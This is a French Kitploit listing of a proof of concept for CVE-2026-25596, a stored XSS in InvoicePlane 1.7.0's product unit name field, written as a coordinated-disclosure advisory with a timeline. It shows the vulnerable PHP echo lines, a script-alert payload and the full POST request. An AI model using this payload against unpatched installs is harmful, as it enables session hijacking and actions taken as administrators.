Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25596 — Preuve de concept pour une vulnérabilité XSS stockée dans InvoicePlane 1.7.0 via le champ du nom d'unité de produit, incluant les emplacements de code vulnérables et les étapes de reproduction. | Kitploit
Outils/GitHubGitHub/lagathos/cve-2026-25596
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHublagathos/cve-2026-25596

CVE-2026-25596

Preuve de concept pour une vulnérabilité XSS stockée dans InvoicePlane 1.7.0 via le champ du nom d'unité de produit, incluant les emplacements de code vulnérables et les étapes de reproduction.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25596 — XSS stocké via le champ Nom d'unité de produit dans InvoicePlane 1.7.0

Vulnérabilité : Cross-Site Scripting (XSS) stocké via le champ Nom d'unité de produit

Produit : InvoicePlane

Version affectée : 1.7.0 (et probablement les versions antérieures)

Sévérité : Moyenne

Score CVSS 3.1 : 4,8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE : CWE-79 : Neutralisation incorrecte de l'entrée lors de la génération d'une page Web

Découvert par : Leonidas Agathos

Date du rapport : 2026-01-31


Description

Les champs unit_name et unit_name_plrl du formulaire d'unité de produit (/index.php/units/form) acceptent une entrée arbitraire sans assainissement. Les valeurs sont stockées et rendues non encodées dans la liste des éléments de facture lors de la consultation de toute facture contenant un produit utilisant l'unité malveillante.

Fichiers vulnérables :

  • application/modules/invoices/views/partial_itemlist_table.php:127
  • application/modules/invoices/views/partial_itemlist_responsive.php:71
root@kitploit:~
// partial_itemlist_table.php - Ligne 127
<?php echo $unit->unit_name . '/' . $unit->unit_name_plrl; ?>

// partial_itemlist_responsive.php - Ligne 71
<?php echo $unit->unit_name . '/' . $unit->unit_name_plrl; ?>

Preuve de concept

Étape 1 — Injecter la charge utile dans le Nom d'unité

Accédez à /index.php/units/form et soumettez ce qui suit comme Nom d'unité :

root@kitploit:~
<script>alert("XSS in Product Unit")</script>

Requête :

root@kitploit:~
POST /index.php/units/form/1 HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

_ip_csrf=...&btn_submit=1&is_update=1&unit_name=%3Cscript%3Ealert%28%22XSS+in+Product+Unit%22%29%3C%2Fscript%3E&unit_name_plrl=tests

Étape 1 - Injection de la charge utile XSS dans le champ Nom d'unité via Burp Suite

Étape 2 — Déclencher le XSS

  1. Créez un produit utilisant l'unité malveillante
  2. Ajoutez ce produit à n'importe quelle facture
  3. Accédez à /index.php/products/form/1 ou consultez n'importe quelle facture contenant le produit

La charge utile se déclenche lorsque la liste des éléments est rendue.

Étape 2 - Exécution du XSS lors de la consultation d'une liste de produits contenant l'unité malveillante


Impact

La charge utile s'exécute dans le navigateur de tout administrateur qui consulte une facture ou une page de produit incluant l'unité malveillante. Cela permet le détournement de session (si les cookies ne sont pas HttpOnly), le vol de jetons CSRF et des actions effectuées sous l'identité de la victime.


Chronologie

DateÉvénement
2026-01-30Vulnérabilité découverte
2026-01-31Preuve de concept développée
2026-01-31Fournisseur notifié
2026-02-04Accusé de réception du fournisseur
2026-02-04Correctif publié
2026-02-05Divulgation publique

Références

  • CWE-79
  • OWASP : Cross-Site Scripting (XSS)
  • CVE-2026-25596

Avertissement

Cette vulnérabilité a été découverte lors d'une recherche en sécurité indépendante. Toutes les informations sont fournies strictement à des fins éducatives, de recherche et de défense afin d'aider le fournisseur et la communauté de la sécurité à comprendre et à corriger le problème. Toute utilisation malveillante de ces informations est strictement interdite.

Télécharger l’outil